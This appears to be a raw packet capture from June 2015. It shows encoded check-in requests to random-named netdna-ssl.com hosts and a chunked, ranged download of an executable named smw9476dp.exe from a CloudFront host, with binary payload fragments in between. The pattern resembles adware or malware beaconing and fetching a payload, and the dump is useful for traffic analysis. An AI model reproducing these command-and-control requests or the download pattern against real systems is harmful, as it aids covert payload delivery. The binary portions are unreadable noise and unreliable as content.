2....D.^jA..$Dk.T.e.>hL1..'tb3M..c,D.H=...cTsY..U_j_b...4.q.}lIh.u.
.3 ..a;[8.!<.....M..R.;_.:.....lr...Q..=...G.e.;O.x=F...[; ...d....
d..=.t...../&.!..9\..A.=.../.A..R@_..Z"S.K. ..g....c..;!.Y.v.N..\.....
.......w.#S:..*t........T.E(.......(..Tv7..3|..b....g.|p!.....VY#.Nt.j
C;)[.. ....%.q.....~L.O..pG.I...$.... 4....".....{.....H1...p..,...Q!.
E..g..Q..4.8.$Y..rZQR.c.........d.L>., .....x.d...V.Pjk.U..H...
<<< skipped >>>

GET /13880.ashx?e=2v0SNuZrMFyRcITdAqjv5kHhmP0JRCH4gcFBH2PvehX UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDo2Fq9Oiiau1gKkdlz1lRofr/zw3mMKgg0JQd5HxgIXdXSs  69z5tFbQfHq0QVBDfGyD/5jiBcsklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:23 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 29 Jun 2015 04:47:23 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /wu.ashx?dsid=1&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: pwvz71qp-ur1xo6pn.netdna-ssl.com

Pragma: no-cache

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:48:07 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 1956

Connection: close

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
nsd1k3V9PgkirFO0x PGVtt1lPlrZA96Zqj/ CCATYgnp4i5zWx9gjqLSw2 4CZWIdRlju
I2q7XjsFZdWk1Pg8JEq4iZIS6f8sxlOfmax/yTZVh lqN8lqNT 5PGKd0Bvw6q BqF278g
TA4xTPdQZowHy4svFk7JFeBYDSgL3YNK8amwFel8pyklkAV6Ob1PAO9frpIyp0ea1Alfhg
dVUMSqg MX2EqGEh5Oennwm5U1GoMIs/o9a5g5IGvl5oV/tkCWbM8d6hI5RT62A2iSkPFO
5RCz91r9MbSxDmGNJ9ZNaiduKrRm1q4crvgG0oLkFFR/BwYLwHA3Jjd5ELY2vQituxCLpS
EqrcY9V/vH9HLCnso VGVr61l VkB8z9J7KyFIqZxAxTZICLkFyXQhfTI0a0KfXKQchYB4
eNDohu5K8krOJ72Kii/XrOAjwaFMYmhZ4gi/f ue8 I0DL1VfiU7ss4sMPEdsc/IIjQ9/W
qqTbRhm59H5oQPfrU6DcFgu26Hx07Cvt4/e2g6g2j/ FV4 BxA5WijmIrnBn64W1qEthIp
IZ7l2DBidM3c1E1pVR3erY1pYmxo8t1tfxQ/9qIJaba2/6AR1hVbtxVAuBEeAFHNcFTirE
t30aAIlHQwAQaGqdd3X9yWkDut /mjcHv6TAtALUDhjJho6JI6gDHpFqhPSg1 JoRBw6nK
tAywm4nnM8NoWmfDwCBnRSNDdt7kRjKBGJI9rBmWx6eFBuvez6T7anDb5rg02rFsfS4z8E
jL4ROws xkUjMhmmhqhy yA5TzzGWDAtfi00P0uO1UfzT95jATtop920vNjaGlrjRRYafe
qM2SRaG13MezKezOBZfpiPHincebPkoMqG1naaw1dJFDsfMExayqMwn8gl9dcBCahLj/FU
C4o3m3RbNlLOAP3WThwmCXqe5nGzl64yvWIA7fC4K/CXGePx17zZGr1OmO T Z8Vs7e5K7
H1LKzibZIte/rYEPSl/SLB5N2zj0lVnzI8YlzXvbe2XSmuB4S7wDDoyTwx3degEgtlvt2C
PMeysdmOGnAQx5Wiavs5yDMVZEhqntu53W1PZNOJd2fWVy8xrrmBcQkTZC0QcjfmkGBKBu
 eObEhu8ZJc8FCvXGnuXqWM1NzDLL1Ld buIJ23M 1jTs63WDyOQae0t/37pm4ddqSFWut
aq1UlyukORGVw8f8Js29c RYCgk5EeY04yT3aMO3a7ZgJW8 YcTMIQRcSX2CPmnhUd6Dd 
5ENzKguG Gc1iNowq3IWJB9pQqrThYjZP y3e1H4V7ohVFtMx6tdCRxLThbE6H2m69F1gW
LZBgPeXRGQNKCQaDid fjh6LHSVFgfzN39v d0LW6byl/OBwXaLv 5iSWMwESiSHrUqDmE
dlfFgpg1Iz1ZBUL1UI88fmpYcr9Qx0oBwHUT/VaI9vhbG/xVzG2W HCUxZeuLx16oaicgQ
Jz2ObwA9QiRAGeqbolMP 2urqgdPywNMdhFUuEpeDNamILfWAflhZddDjjaDSXiLpY
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 750000-999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fjFc4N3Ozp0m26i28MXCbXQeum0NqLS4mIi4vzc-VnWQpfK27NKjkQ==
j.%...Q.....t...U.yx6_U..\C0.i=.W8.....x.e|.....u..P......._...7..m..g
.....m.#...E..JD......{[email protected]{......,K2knQ.Z1..q3{.IVL..PB).3.........
........me........".q...v..jqm.....,e....Z-.:...}a.v.........BV[3....6
v.....U.<a5q.....:......A..!...{.k......W..U..L%..Z..cGUgs7..t... H
......I..I......FN..&L..#...B..hWg9,....r.i*E.r.u.._...^.._...B3..../.
...R......X..i.B...<.0...DT]...}......iA..]**{..U...C)|?B....$....G
K..|...Cr"...IV'..^........W.5./...'.m`..'..LI#.Us.0n.s:Hw..Ed?3...V.O
.zIC..1...XT.i...\fA.&...XC.!..S_%2=..i0K....f...6...;..`..].`....$Z.^
.....r!.Y.. $....Yjg......r"G....V.hk&....Z..).&b.$.[ <&..z`n.V....
........t.....(.c.W...`9..7&...]..=.X..461......}*...][..a.7.a.L......
.S.N...M-..........Y4.......I.$C..O]..f....#.....p.....f0.8...p.Y=OP.$
..nC'.:.B.....>..P..p5...D....~.2....@:..C...=..yc...s,....d..\..6.
......L...}.>/...I...ab.......M........\d.G.7\.[.....k..[u.>..?t
.......z..a.s.2..:Ys/}..Y....P,...//..OP...g......n(w2..*Y.....)...<
;......jL]p%q ..=.I.%.=M@..<....dI.|.s[..6...O.9.....%..tqZr/O .gL.
)...u..O.A..CiF.gw.t3.....i.R......#....^]..Q?A.U-*........O....`T....
.tj,h...a...z.j1....Xr;..\(..Y6...n....,4.Hm.B.|.,..PxU...A*...o..[?..
.XsjnKK.*cD....)dOQ..!.}....N.....u.i.-......W...3...T.y'd."....(....&
lt;..ww....y[L....[...J.>.O9.....)...!p...ic.f..J.M....@[.../...HC"
..c.....m.. ..o.g..l..........E.....^....].^..r)% .-).j .I).SZ.c. .wtI
.q..&.0....o.&......{..t..,..[2.\... x....[..".D..>W.'...c.!H.....j
...ODo....w~...a1..V......mJN..J......@ .pj...3U;z,6.C.~.......9Z.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 1500000-1749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BM90VHBU7Rz15T7HqJkquXvORcjl3SNy0s8567bsG4jOwEkREwDYRw==
.[........_T....8rxU....6........b.:...%p`..W.4]......Ev.=D..g..H..#..
.67{..K6.}.6..Q6..z....T.._....1L....s... *...D;..0F..R.x.T.7k....G.Xc
..;.)......^..Wh..]...cU...O....c..[~.Y.1 ........ \...c..[..M..K.....
qx.~...P..j.._]."U..ve&...5.tc..h..r[..."...S.d...D7f:.[.....-..{.....
.....c....R..'D..B......=E......E..L..pI.....=4.........y_.V....{....^
2$...n.......L.c.p.....y[([email protected]...)A0o8.........i=7..
0....peS........2.sx..?L....e {f..r..(gz.w(C...K>....W.....s..!.<
;$..w.MR..%`j...l...Q@K..|".Q............K.....~&.Kj6w...q...G...~.DT4
.E..........~.....Pp Q.U...S.......4...-.V..n...k...X..%g.E.R.].._W..M
..-.k.PX...z.-3..........L`.{V......)...N0.K..A...H"pN]%.......d.`..c-
G}.Z.B....e......M..Z.o....T.y.`..j.t...G......f.j....L.....?{.....-..
...I,....=....G..a.......K4.......P^.%...i..N1..Y..V...,\.W.o....,A...
.[O'...:.e!....J.......#.U......i....}>!!.iJB9j.........8.6VD.*x..H
...>S<...W.>.9.9(2.F.9..]7..)Gx.S...[.......O....U=K......r..
.s7....<6.......7.h.SSJ..V.N....u...).cz..,x6..EX...{p....~`6.v=..M
 "..s.K.=3(U......8..^@.Y....q\..#V8A7<.Qk..,..AK.EE....u...F.~...v
T...T..s.61...zzq.....2.s,.......A1..*&..A....~..8@~$.O}[email protected]
.........2.k.tj.......4.x.......}..d.........N...3....5......]..EG.3~.
.`.=.(.....0&o.L8...Q.../{.$..l...znm.pi*.B....HD...........T.%....j..
.#...}R O..|[email protected]... ............oyW.w..6. .8&Z....B.S.P..=Y.....9...Yu
.c..A'..`......L.>.....Z.5.....I..4... .a..zYB....H.{.z.L.mZ.|..8..
d;[bhI..Y.....j...<X"...W.l.".).y>.......YR..&."XPg.<...c
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 2000000-2249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: QrpQNA8jqeyUSb8IzEGycn_ms6U3Mt2kafFhm36TP0Yxn22XqXSOSQ==
E{...........D..2. A.z.Y.a.>.8..U"*..>.v.[.].K..(....K...O....0.
*`.`8.Y.P...u5..c.K..1jJ.y.p[..p.9O1.y..EV..d.ds.....O..6..0.......@m.
*.@ [email protected].~...%[email protected]*..n..,....HG)....6
...{..S..ys...#C4...&3.<...Q. ..qk7.....A...I.#..Z...1.4r..e".&.E..
.l.a]&.ld.kMt]`...n..\....s._.;.......MfI.....1....S......^j...s.P....
...#.......W.....{.....'...*......8.QZ...w.q....a8.5..d...;....?..#...
-...P....5......^j...y..I.z......W...i.[y..........F.[NO*.1..J.3...n..
h.]....[........7..e`..3.}...(...;.......o..@,...6n...e Us..@[...#..Yw
.e..9...$....~HN.......lZi...H.~d..O...k.....jk.}.@#...e.4.M}...V.....
.u...s..N2.H[6.?.^......gB.;.... r.C..m.I.&...P...E.$...`t..j*..t_....
L......l...1....>.|....d...dL.^.....Re&~.^.k..Y...xz..A/...].(.o...
.N.j..&d.<.... .7..D...rA....Y....p.|.....U.......o..z.....#.xN...e
.yr.Xto.d(.9..n.....6%m..[)b.......L.Lc8F..~..J.......u...=........u..
*[email protected].?....h...K..Wh[.Q6Axt.;......}......2..pv..sf.>..[EW.i\.S|B
.....k~..o..T.v.x..o...q6~6.E0......9.$.d.#S[...E.x.i...........:.15t.
....E...il.._..Y....3.S.jLij.w......7.[..1.).?F......D1..t;pz..W..C_..
.....^.3...]Jb.....K1>|.y."...]"P.q..;...{.X.zQ.D....E..z....aD>
8.."..V*. ..c.Z.vA...8....R...fW..>....1...|. -aa.....S...*.....p6k
%.....Eqi.<.%.#..c...r..:U.h......&J..0...v-.....P..G....J..^.R..$a
.....U.......C.?".......N...#......>Q.....2.....7p....T..$?3..1{#..
c.Uj....Y...YFRM......TJ.....gG.&*nd%.=.z..v..Q.`5..A..@_.{..O........
)[email protected][.x..7....~.....RI.3S...1.g.k..~JV|...3.{........7.l..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 28 Jun 2015 10:24:00 GMT

Content-Range: bytes 2500000-2749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: D3oxz9DKmSeE6DnaurxysCxukxPrd0fn1EBZAN9RYyHCM_G6QGRmDw==
.N...&'$....d.../..._d......S...N..... ..zd.~..(.H..~.|...;y.^.?.Y>
).0..]....L..7F.h.y.(...|r.r.-#a..P....J..\....4..s.....A...$?.g.....B
.;2.8.58.....F(n.%....*MLn.....d...9.v..zk.N.c.R..........N.}..l...].U
.0...*..C.n.'..e..:7..7......d..A...^..l.[E...$.E|....f.o .Tb....2..U(
............([email protected];... .O.......[....(}.-Q.....].LC.....L
n;....\..R...............J..j}V.-:....`T..=5.8.2.u...V.G.*.F.1*....h.h
}..$...T(.SC.......{<.]...WK...,.c.([email protected])S..
%......<...K.. E..VI........WG.1<.../....Am)...:...HP......kl...
<...r..Ll$o./....w..r.K.o.5.z.k..0C...N..N...Z.k]...7.)h..".}.o...A
....#.{/.........QR.Qb..n....d0..?./.. W.Z..^..hW...........J.0.t..M..
I.|...i...Xw3....l/).......a..K.......6..48T..O.....7.7..{,1{....b./..
...&Q.1Xu...._.?.\%..W....M..c...<...W..SX:.Gp...3.ED...q..=m..G$.A
.!M?.a..Za..Z....&...R..Dy.`Y>...b.pr`..[.....6.Uo..T..... ..,..a$S
..j.ZR\rZz.?......F.....'.....l..Q.w.....(.j...]w.]..5mAg..G..L.....p.
W1......1k..C.^..4..S..@`........M.[.......jG......0.~-....\|5|.C.R.m.
.s.......Y.\....R1....$k... [email protected].....:85........e.
...m.F....(..6..s..........n..B.....O.b;..........Q.....oc..?u#.j.....
.2b.U1..N....x...3.T@...<..v3..<.. .T.....]..*.....]..z.Jp.6...%
...?..X8.p...E.z.B.........Pd\.....K...B......AN.|r...z2......,....>
;.U..@]*..l..D.|._9?n..X...."t.x.T..<.....z.....]....qB.-#B..3....%
....]....../h...Z..k..........Z....b.5.$V*..i.`1...*..U.......n.~..Ilf
y\.?.......&..fU,.....-........c\. ..$ .X.'...ky..j3[k........,...
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 28 Jun 2015 10:24:00 GMT

Content-Range: bytes 3000000-3249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: JGUWECSj-Jj0E0YW1tjBX8mnyvh9OZHY4ZZZNqrsYyM-qLHhwc8Pbw==
......BUPE.-4...N.(.....i.n.t.......hU"...@".*d..:...<(d-...4G2-..:
..%y..cyIA...J...<.....TU.#.T.,c..\5....D..M":...Pk.H.... ..ol6$.7.
...k.3B.f (!.a7.....f..6C\.2eU....w.N.........1C..nQ.9F.]g/....&....$.
..ra .Acr0.>,.... XB.q...!,....F2..^y....R`.n1n....Q..!Q..f9tnZ..E.
........./7@.......#,F......M._.W.n;l.....[......'...N....j..}Hk.|...z
.G"akK......6..J........x..Kj...\...Q.j.a...4.i>^..........fZ......
..C|.,eA......._.m....>V,..|8.......T....~.............y.7\-.]<Y
x ..#..b..([email protected].:........n.6...........o?Mu...-...h.Plh
.....Q.....%..L.9....|.6^.;.].8.i..vn.h<,.{........1....X.H.8....m.
w..5c...ur..!.....B......J.......8j.z'.D.".....:.b0.S...(*.3N..".p..t.
....3c..!...<..Y.U............7G.(.......uyl..:..O{.-..~.[=.f.V....
Z.?.I..2...m.C4...H...g.8........ ..\..A..f...m..W....?..,L.....!..r.!
m.!.D.T......i](.C....a,.v{........^......s..n..".3....|..r.?n........
...E.a.6.Xq..F5.(%D....9...'.....A.].8..b]...j....zt....e*...w.J..*8&l
t;-.|....0....d..)......gT..d.Z.D.K:eLC.....^.......D...n..H:#.<..h
B....[.......c....n......r"................F.....9DC-.....%.b..P...V.?
4...@ERy.......;.N.L..b..,..V.8....`..*.....@U#'.,.g.R3...3>.<.?
...`G A.....|.C.*..J..C...`...C[[email protected].".
.|...F..H.N......O...Kp.L.....d....VIU.'.u...FYn.j@).7.e..B....j.....F
...1...F..$q......*y.......Q..%!..5.F..@.`c.yZ...w'.A....i...;...G...N
Z.3..L......s...;..G.....9.j..O.d......py...z.5..5..mQ.....X....!.[..n
2=....F..I...9%.R...2.D.C.F....A.b.....>.....i.;.w..,ch..R..5(z
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 28 Jun 2015 10:24:00 GMT

Content-Range: bytes 3250000-3499999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: QGusY3E2jAlus0-Un-VtmVCZHTxDiZJOEk5dBeW4woW1OVQSanNLug==
g.u..u..f...{.l%....&.9V..D.........]wu.h..I.!4.E.To.&.H@2]..3........
{ &c.e.\Q..9T.K..[...jy....V[..j..`....c..%.:....D..sP......d..7xv../.
.Hn.......F.L.9.......&....[. z...p.../Y.....L......)L.C.\B.L(.?.D..So
.;.7.._M...FJ...wj...RiT..K..A...x......},[email protected] .....
!&.Lq7..PS...`.....%..O.5_mITP.......?.x6Xh\.n~a.w\.&.mo......[.(&j...
..,1~....H.......nU.].....U..h...o}.F(....((wj....\m...]t".\.]@..].#.!
....Tw..TO../.V o.......L.;.VAaH.<...u...=H....`.....Ox8x:........A
.$...-...'t.....#...O...,..Eb.....]..qd...yOv.=d'f.....J.V.....D....2Y
....es..by..j.(..X.;z.`$Y.}..M&=...jNL.}{a......'.........c..R.....'..
.58..\^Y....e@(.S. t:.................Ao..f...7P..]?..-{......m. )h.A.
<....r........ ..%..~..5.v. .LT..".;[email protected]..\[email protected].
H.t..l.w....p..%...h.....}.,.0<K.FI.&.....X..qc.f%.Y.......l%/U....
D.8....$.X...H=..?.G.`U.0U.....p].X.B.h:..F3.N.ODK......P,.%......?.~.
..:.Ll.%,q....8x....;j I/..,.U......|...luh1S.._....q`G.Z y....%......
..d........^.q..c....}.gOq izp...w..\T.c.....}......A....9....r.a@7...
.LFm..S.../....UsC.....:R.\G....s...?.hF......7..;g...*T.X.U...*..n..U
U..p.cY?}y8.<..8..5.).Bi.....b.......x.......j.;......a?o.....7...{
.n.9....[..H.(....N.......3..b.........#?...h2c........EO..E...<...
./..=../.Vc.L.:..gg{[email protected].
.....5.N..b..R0[N.P.2.m.....??...}.o..-.....~>......]xwz_........&a
...m.2...h..z.....(2......,u2.*.M..... n.u....a............_.{..WB...|
.i....gh46Y.Z,.a...Y.O.......ce/..{...<..l...|.uG....M..1..Ie..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3750000-3973863

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 223864

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 28 Jun 2015 10:24:00 GMT

Content-Range: bytes 3750000-3973863/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 c2890b1d84d781704a34b9aa5c069d4e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 8Z95DMEErTuxcM97fTSflFE4i8oTbzUK205jISY26NbAi1k5KlXLNA==
S....V..j...#P.....&..'.......6;.|a=...|.n:.O.<......9KOn.C_......,
..1...f...m..Z......hy....E..{.q.O.A.X.`{......._.=N%.Y.R.g...K2~..q.{
..:.9.<...i..00.?..4WW..L.4.&.K.1.-..L...!S.fL...i.."..R.u.........
.O.o.D..x...k......a...wh.h4.`.Q...."0B'.}.'.... )..:.x>H.g..~@... 
. ...OIj.9j_g........0.......(.s7..."..{.h4.T."...5.$r,:.i..D..%..a...
...OC....~k>...B.E..AdaN..S|s.iI........fi.Abp.Y.N'.c.7.9.....'.&[.
......Iy.?..6..(.:.6.......4(c^oQ;.1....PRE......pn..j."ku...0...].A..
....),...e....HK&..N^e......Y...F-..N....k..Lh*...`....L...kU..qc....V
..w...1.../.......?.<.}5j.Xyn.....)G..g....WImj.m.....H......'~.NU.
Z..R.^.....)...|.V...d...M..k{.*....8......C..K.OS&q3/#.).n........_..
6.t.h.j..Ob..V.gr.v r..X.2.W.^A `y..rr.pn..9'.w........._l..u#.s.w...;
P...tlEf..G...g...~.I..k.../.;..|...H..s...6r.......>w...5%t.X.....
9<]b......4A..,....Fhb.J..|-.}........F.C^.k...6.a..........y.@l.._
..L.8.#U.........RWc3doi.zT... ."CJW...5..F.n......hN C.Z.5.%@...b|..T
....o.$.b.p......X....%..yiq..6~G........Bk...E..=(...6T.<..M....9@
%.yj1..}O..S.).....M...U.T.W.w:<4..aO.]....EO..*PVbz...........|..^
.G. ..2...|.,.y..@.............*a.......7..YM..- ....d.....{.n.Y..Z.I.
*/.u...$......4.*_L...k86.`.s.!.........7..H.' .*...T67ik2..E...x...R.
..×..1..5E.-..x......\J{...M!/..2s...._..J..W.dm......S..4Y.ak..V...
.'FK0...4...>PD6-......dn..x.F.8k. A.[..l....V..o..oH.t....Z..P.x..
.^..>........8......m.F?j..;.....Gb(...c.. .....q...Os.([.g=.2...^/
..lV.aE.lJ..I...|...D.9....:'.Y........Z.....U...!}.".].. l.N....[
<<< skipped >>>

GET /13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWDz0zfD6NQ4eEwAaRG2pHiUPesst1ukiDgCtEn0QpjuXhJ1Bh5YeUQcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWFDwWd9hvLDxFAL52sIXt4V5Y7GubTS4jNqcBUeWZ/68JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufTQmrBFp0jDU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


